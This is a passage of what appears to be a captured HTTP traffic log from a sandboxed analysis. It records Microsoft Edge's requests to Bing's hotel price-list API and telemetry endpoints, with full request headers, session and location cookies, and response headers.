cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHS=PC=U531
cookie: bm_sv=F51C12F0AB3E06E3241F6D62FF6558A7~YAAQTTZ6XGOoT4iTAQAAGM4kkRpaZi0bVBCtTANwSkAH0fWYHJL4Z0ak0eGWRx0d91Yt3S1Gpqx8fXWtiH02lu4qOYXv2Kml8ZnTM4Shu2oAy2qYJghYJNeJDUM0X2sD3J9zKV5Sai+MDA0KTxwErd5CZ50F9evkxVpRijbIgXU3WxpyRwQJ732VjazR+GZig+mxnXUW+49w0QEf9WOXAZrUwWtUY3QvDSqpxmofWDF2QGLVjjWDOJDCEdPWLA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1add1
POST

https://www.bing.com/travelhotelrentalpackages/api/v1/hotel/providerpricelist?IG=6AB2CD56EF6C4338BF41C655438BDF1B&IID=5672

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /travelhotelrentalpackages/api/v1/hotel/providerpricelist?IG=6AB2CD56EF6C4338BF41C655438BDF1B&IID=5672 HTTP/2.0
host: www.bing.com
content-length: 535
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/json
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHS=PC=U531
cookie: bm_sv=F51C12F0AB3E06E3241F6D62FF6558A7~YAAQTTZ6XGOoT4iTAQAAGM4kkRpaZi0bVBCtTANwSkAH0fWYHJL4Z0ak0eGWRx0d91Yt3S1Gpqx8fXWtiH02lu4qOYXv2Kml8ZnTM4Shu2oAy2qYJghYJNeJDUM0X2sD3J9zKV5Sai+MDA0KTxwErd5CZ50F9evkxVpRijbIgXU3WxpyRwQJ732VjazR+GZig+mxnXUW+49w0QEf9WOXAZrUwWtUY3QvDSqpxmofWDF2QGLVjjWDOJDCEdPWLA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

cache-control: private
content-length: 212
content-type: text/html; charset=utf-8
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a3108a34834a46f0622ebc1e535
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-6BG5w+YY8MQt3Vc0msV6jcXwfaoLjh0Sp8ufIcOIQpg='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 9EC9B134E1FC47E49774C75D34F7DB4A Ref B: LON601060108034 Ref C: 2024-12-04T10:08:49Z
date: Wed, 04 Dec 2024 10:08:49 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:49 GMT; path=/; HttpOnly
set-cookie: SRCHS=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: SRCHS=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1ad82
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306920174%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%2210%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1733306920174%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A481%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306920174%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%2210%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1733306920174%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A481%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHS=PC=U531
cookie: bm_sv=F51C12F0AB3E06E3241F6D62FF6558A7~YAAQTTZ6XGOoT4iTAQAAGM4kkRpaZi0bVBCtTANwSkAH0fWYHJL4Z0ak0eGWRx0d91Yt3S1Gpqx8fXWtiH02lu4qOYXv2Kml8ZnTM4Shu2oAy2qYJghYJNeJDUM0X2sD3J9zKV5Sai+MDA0KTxwErd5CZ50F9evkxVpRijbIgXU3WxpyRwQJ732VjazR+GZig+mxnXUW+49w0QEf9WOXAZrUwWtUY3QvDSqpxmofWDF2QGLVjjWDOJDCEdPWLA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

cache-control: no-store, must-revalidate, no-cache, max-age=0
content-type: application/json; charset=utf-8
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a31ff0641a0826773d0fa43f331
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-q3Wi/3E+HibLRSyY+5UtAWcK+T3Xkalje1Z6ALaS0gI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: A8C8B4F745BA49D6820E2F0417C48292 Ref B: LON601060107034 Ref C: 2024-12-04T10:08:49Z
date: Wed, 04 Dec 2024 10:08:49 GMT
content-length: 4667
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1ad88
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHS=PC=U531
cookie: bm_sv=F51C12F0AB3E06E3241F6D62FF6558A7~YAAQTTZ6XGOoT4iTAQAAGM4kkRpaZi0bVBCtTANwSkAH0fWYHJL4Z0ak0eGWRx0d91Yt3S1Gpqx8fXWtiH02lu4qOYXv2Kml8ZnTM4Shu2oAy2qYJghYJNeJDUM0X2sD3J9zKV5Sai+MDA0KTxwErd5CZ50F9evkxVpRijbIgXU3WxpyRwQJ732VjazR+GZig+mxnXUW+49w0QEf9WOXAZrUwWtUY3QvDSqpxmofWDF2QGLVjjWDOJDCEdPWLA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1aeb8
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHS=PC=U531
cookie: bm_sv=F51C12F0AB3E06E3241F6D62FF6558A7~YAAQTTZ6XGOoT4iTAQAAGM4kkRpaZi0bVBCtTANwSkAH0fWYHJL4Z0ak0eGWRx0d91Yt3S1Gpqx8fXWtiH02lu4qOYXv2Kml8ZnTM4Shu2oAy2qYJghYJNeJDUM0X2sD3J9zKV5Sai+MDA0KTxwErd5CZ50F9evkxVpRijbIgXU3WxpyRwQJ732VjazR+GZig+mxnXUW+49w0QEf9WOXAZrUwWtUY3QvDSqpxmofWDF2QGLVjjWDOJDCEdPWLA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1aeb9
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.NumGuestFltrNotFound%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%22NumGuestsFltrEvent%22%2C%22FID%22%3A%22HotelListing%22%7D%2C%7B%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22OCardCount%5B6%5D%22%2C%22FID%22%3A%22HotelPrices%22%7D%2C%7B%22ypid%22%3A%22YN2000x1190976147452155201%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%C2%A399%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

